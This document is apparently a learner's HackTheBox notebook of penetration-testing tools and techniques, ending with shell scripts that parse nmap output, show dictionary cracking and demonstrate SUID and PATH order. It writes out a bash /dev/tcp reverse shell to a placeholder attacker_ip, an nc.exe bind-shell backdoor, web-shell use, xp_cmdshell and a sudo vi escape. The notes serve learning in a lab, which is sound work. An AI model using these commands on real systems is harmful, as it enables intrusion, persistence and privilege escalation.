Start!HackTheBox

These are my notes on what I learned while working through HackTheBox.

Start Point

HackTheBox is a good place to start hacking.
First of all, you need a Kali Linux (or other Linux distro) machine to attack from.
Here I run Kali Linux on Hyper-V under Windows 11.
Start with the following steps:

  1. Install Hyper-V on Windows.
  2. Open Hyper-V Manager.
  3. Create a new VM.
  4. Use the following settings:

    Tips: Some of the settings depend on your hardware. The rest can be left at their defaults.

    • Name: HackTheBox(or other names you want)
    • OS: Kali Linux
    • Memory: 4GB
    • CPU: 4
    • Network:
      • Type: Outbound

Start hacking

NMAP

nmap is a powerful network scanner for discovering hosts, open ports and the services behind them.

usage:

  • nmap -sV -sC -sS target_ip

some common options (note that several of the one-letter scan types look alike but do very different things):

  • -sS for a TCP SYN ("half-open") scan; this is the default scan type when running as root.
  • -sV for service/version detection on the open ports.
  • -sC for the default NSE script set (same as --script=default), not OS detection.
  • -O for OS detection (OS fingerprinting).
  • -F for a fast scan of the 100 most common ports; -p- scans all 65535 ports.
  • -sF is a TCP FIN scan (a firewall-evasion scan type), not a fast scan.
  • -sO is an IP protocol scan (which IP protocols the host answers), not OS fingerprinting.
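A typical workflow is a fast full-port sweep saved in greppable format, followed by a -sV -sC scan of only the ports that came back open. The script below is an added example, not part of the original notes: it extracts the open ports from nmap's -oG output so they can be fed back to -p. The scan text inside it is a constructed sample with a made-up host and banners, not output from any real target.

```shell
#!/bin/sh
# Added example: pull open ports out of nmap greppable (-oG) output.
# Typical two-stage use (not executed here):
#   nmap -p- -T4 -oG all_ports.gnmap target_ip
#   nmap -sV -sC -p "$(open_ports "$(cat all_ports.gnmap)")" target_ip

# Constructed sample of -oG output; host, ports and banners are invented.
# The -oG "Ports:" field is port/state/proto/owner/service/rpcinfo/version/.
SAMPLE_GNMAP=$(printf '%s\n%s\t%s\t%s\n%s' \
  '# Nmap 7.94 scan initiated (sample)' \
  'Host: 10.10.10.5 ()' \
  'Ports: 22/open/tcp//ssh//OpenSSH 8.2p1/, 80/open/tcp//http//Apache httpd 2.4.41/, 135/filtered/tcp//msrpc///, 445/open/tcp//microsoft-ds//Samba smbd 4.6.2/' \
  'Ignored State: closed (997)' \
  '# Nmap done (sample)')

# open_ports TEXT: print the open port numbers as a comma-separated list,
# which is exactly the format nmap's -p option accepts.
open_ports() {
  printf '%s\n' "$1" \
    | grep '^Host:' \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State:.*//' \
    | tr ',' '\n' \
    | awk -F/ '$2 == "open" { gsub(/ /, "", $1); printf "%s%s", sep, $1; sep = "," } END { print "" }'
}

# open_services TEXT: one "port/proto service version" line per open port,
# a quick triage table of what to look at first.
open_services() {
  printf '%s\n' "$1" \
    | grep '^Host:' \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State:.*//' \
    | tr ',' '\n' \
    | awk -F/ '$2 == "open" { gsub(/^ /, "", $1); print $1 "/" $3 " " $5 " " $7 }'
}

open_ports "$SAMPLE_GNMAP"       # 22,80,445
open_services "$SAMPLE_GNMAP"
```

Filtered and closed ports are dropped on purpose; only entries whose state field is exactly "open" make it into the list.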

smbclient

smbclient is a tool for connecting to SMB servers.

usage:

  • smbclient -L target_ip
  • smbclient -L target_ip -U username
  • smbclient //target_ip/share_name -U username

some common usage:

  • -L for list shares.
  • -N for no password prompt (try it first for anonymous/null-session access).

some common commands:

  • ls to list the current directory of the share, get to download a file.

gobuster

gobuster is a tool for brute-forcing hidden directories and files on a web server using a wordlist.

usage:

  • gobuster dir -u http://target_ip/ -w wordlist.txt

some common usage:

  • -u for target URL.
  • -w for wordlist.

some common commands:

  • dir for directory/file brute-force mode.

Impacket

impacket-mssqlclient

impacket-mssqlclient is a client for MSSQL servers with some extra features, such as enabling xp_cmdshell to run OS commands through the database.

usage:

  • impacket-mssqlclient username@target_ip -port 1433
    (add -windows-auth when the account is a Windows/domain account rather than a SQL login)

some commands inside the client:

  • enable_xp_cmdshell to turn xp_cmdshell on (requires sysadmin rights on the server).
  • xp_cmdshell "powershell -c pwd" to run an OS command.

impacket-psexec

impacket-psexec is a tool for executing commands on a remote Windows host. It needs credentials with local administrator rights, because it uploads a service binary to the ADMIN$ share and starts it as a service (which also makes it noisy on a monitored host).

usage: impacket-psexec {USERNAME}@{TARGET_IP}

nc.exe

nc.exe is the Windows build of netcat. In the form below it listens on a port and hands cmd.exe to whoever connects (a bind shell), so you can use it to keep a backdoor on the target.

usage: nc.exe -e cmd.exe -l -p port

Burp Suite

Burp Suite Proxy

Burp Suite Proxy is a tool for intercepting HTTP traffic.

Burp Suite Target

It builds a site map of the target.

Just set your browser's proxy to Burp, browse the target site, and the site map fills in as you go.

phpshell

phpshell here means the PHP web shells shipped with Kali: a PHP file you upload to a vulnerable web server that lets you execute PHP code, and through it system commands, on that server.

On Kali they live in /usr/share/webshells/. The reverse-shell variants need your IP and port edited in before uploading.

John the Ripper aka john

John the Ripper is a free password cracking tool.

First, convert the target file into a hash that john understands (zip2john for zip archives; similar *2john helpers exist for other formats):
zip2john target_file.zip > target_file.hash

Then use the following command to crack the hash file:
john --wordlist=wordlist.txt target_file.hash

hashid

hashid is a tool for identifying the likely hash type from a hash string, which tells you which hashcat mode (-m) to use.

hashcat

hashcat is a tool for cracking hashes. -a 0 selects a straight (dictionary) attack and -m selects the hash mode; -m 0 is raw MD5, so change it to match the hash type you identified.
hashcat -a 0 -m 0 target_file.hash wordlist.txt
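To make the -a 0 / -m 0 semantics concrete, here is the same dictionary attack written out by hand in shell. This is an added example, not from the original notes and not hashcat's own code: the wordlist and the target hash (the raw MD5 of "password") are constructed for the demo, and md5sum/sha1sum stand in for the hash modes. Cracking with the wrong digest never matches even though the word is in the list, which is why hashid comes before hashcat.

```shell
#!/bin/sh
# Added example: what "hashcat -a 0 -m 0 hash wordlist" does, by hand.
# -a 0 = try each wordlist entry as-is; -m 0 = hash each candidate with raw MD5.

# Constructed target: the raw MD5 of the word "password".
TARGET_HASH='5f4dcc3b5aa765d61d8327deb882cf99'

# Constructed wordlist in a temp file (stands in for rockyou.txt). Prints its path.
make_wordlist() {
  f=$(mktemp)
  printf '%s\n' 123456 letmein admin password qwerty > "$f"
  printf '%s' "$f"
}

# digest ALGO STRING: hex digest of STRING via md5sum or sha1sum.
# No trailing newline is hashed, matching how crackers treat a candidate.
digest() {
  printf '%s' "$2" | "$1" | cut -d' ' -f1
}

# crack ALGO HASH WORDLIST: straight dictionary attack. Prints the matching
# word and returns 0, or prints nothing and returns 1 when the list is exhausted.
crack() {
  while IFS= read -r word; do
    if [ "$(digest "$1" "$word")" = "$2" ]; then
      printf '%s' "$word"
      return 0
    fi
  done < "$3"
  return 1
}

wl=$(make_wordlist)
echo "md5sum  (right mode): $(crack md5sum  "$TARGET_HASH" "$wl")"
echo "sha1sum (wrong mode): $(crack sha1sum "$TARGET_HASH" "$wl" || echo '<no match>')"
rm -f "$wl"
```

Real crackers do the same loop on the GPU with rules and masks on top (-a 3, -r), but the mode mismatch failure is identical: a salted or differently-hashed target will silently exhaust the wordlist.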

sqlmap

sqlmap is a tool for automating SQL injection.

some common usage:

  • -u: target URL.
  • --cookie: cookie.
  • --os-shell: try to spawn an OS command shell on the database server.

To turn a limited shell (for example sqlmap's --os-shell) into a proper reverse shell, run this on the target, with attacker_ip and port pointing at your own machine:
bash -c "bash -i >& /dev/tcp/attacker_ip/port 0>&1"

Don't forget to start nc listening on that port on your machine before running it.

Then use the following sequence to upgrade the reverse shell to a fully interactive one:

python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

The python line allocates a PTY on the target. CTRL+Z backgrounds the shell so that stty raw -echo can be applied to your local terminal (it stops the local terminal from swallowing Ctrl+C and echoing keystrokes); fg brings the shell back, and TERM=xterm lets programs such as vi and clear work.

Get root privilege

vi

vi is a text editor, but it can also spawn a shell.

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

sudo vi -c ':!/bin/sh' /dev/null

If that does not work, open vi and set the shell from inside it:

vi
:set shell=/bin/sh
:shell

Common knowledge in Linux when penetration testing

  1. Quick password check in the current directory (quote the pattern so the shell does not expand it):
    cat * | grep -i 'passw'

  2. To get a functional (PTY) shell, issue the following:
    python3 -c 'import pty;pty.spawn("/bin/bash")'

  3. Check User: cat /etc/passwd

  4. Find files belonging to a group: find / -group {groupname} 2>/dev/null

  5. Check a file's permissions and type: ls -la {filepath} && file {filepath}

  6. SUID (Set owner User ID) is a special permission bit on executables with a single function: a file with SUID executes with the privileges of the file's owner, regardless of which user runs it, so a SUID root binary is a classic privilege escalation target. In ls -l the bit shows as a lowercase s in the owner's execute position; if the owner has no execute permission it shows as an uppercase S instead.

  7. PATH hijacking: if a privileged program runs a command by bare name instead of by absolute path, the command is resolved by searching PATH. Put your own program with that name in a directory you control and prepend that directory, so it is found first:
    Like: export PATH=/tmp/bin:$PATH
    Appending (export PATH=$PATH:/tmp/bin) only works if the command does not already exist elsewhere in PATH, because the search stops at the first match.
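The following script is an added example, not part of the original notes, that exercises items 6 and 7 above in a scratch directory: it creates SUID files with and without the execute bit to show the s/S display and the find command used to enumerate them, and then runs a stand-in "victim" program that calls whoami by bare name with a controlled directory appended versus prepended to PATH. All files are created under mktemp -d and removed again; no system binary is touched, and the victim script and fake whoami are constructed for the demo.

```shell
#!/bin/sh
# Added example: SUID bit display/enumeration and PATH search order,
# using only throwaway files under a temporary directory.
set -u

# ---- item 6: SUID bit and the 's' vs 'S' display ------------------------
# Creates two files: one with SUID and owner-execute (ls shows 's') and one
# with SUID but no execute bit at all (ls shows 'S'; nothing can run it, so
# it is not an escalation candidate). Prints the directory path.
make_suid_fixture() {
  d=$(mktemp -d)
  printf '#!/bin/sh\necho suid\n' > "$d/suid_exec"
  cp "$d/suid_exec" "$d/suid_noexec"
  chmod 4755 "$d/suid_exec"     # -rwsr-xr-x
  chmod 4644 "$d/suid_noexec"   # -rwSr--r--
  printf '%s' "$d"
}

# suid_mode_char FILE: 4th column of ls -l, i.e. 's', 'S', 'x' or '-'.
suid_mode_char() {
  ls -l "$1" | cut -c4
}

# find_suid ROOT: SUID files under ROOT that are also owner-executable.
# The classic enumeration is the same command with ROOT=/ :
#   find / -perm -4000 -type f 2>/dev/null
# -perm -4100 additionally requires the owner execute bit, dropping 'S' files.
find_suid() {
  find "$1" -type f -perm -4100 2>/dev/null | sort
}

# ---- item 7: PATH search order --------------------------------------------
# "victim" stands in for a privileged program that runs `whoami` by bare
# name. A fake whoami is placed in a directory we control; MODE is "append"
# (PATH=$PATH:dir) or "prepend" (PATH=dir:$PATH). Prints whatever the
# victim's whoami call produced.
path_hijack_demo() {
  mode=$1
  d=$(mktemp -d)
  mkdir "$d/bin"
  printf '#!/bin/sh\necho hijacked\n' > "$d/bin/whoami"
  printf '#!/bin/sh\nwhoami\n' > "$d/victim"
  chmod 755 "$d/bin/whoami" "$d/victim"
  case $mode in
    append)  out=$(PATH="$PATH:$d/bin" "$d/victim") ;;
    prepend) out=$(PATH="$d/bin:$PATH" "$d/victim") ;;
    *)       rm -rf "$d"; return 2 ;;
  esac
  rm -rf "$d"
  printf '%s' "$out"
}

# Stand-alone demo output.
fixture=$(make_suid_fixture)
echo "SUID files under $fixture:"
find_suid "$fixture"
echo "suid_exec: $(suid_mode_char "$fixture/suid_exec")  suid_noexec: $(suid_mode_char "$fixture/suid_noexec")"
rm -rf "$fixture"
echo "append:  $(path_hijack_demo append)"    # the real whoami still wins
echo "prepend: $(path_hijack_demo prepend)"   # hijacked
```

The append case prints your real username because the search stops at the first whoami it finds, which is the system one; only the prepend case reaches the planted binary. The same ordering rule is why hardened sudoers configurations reset PATH (secure_path) before running anything.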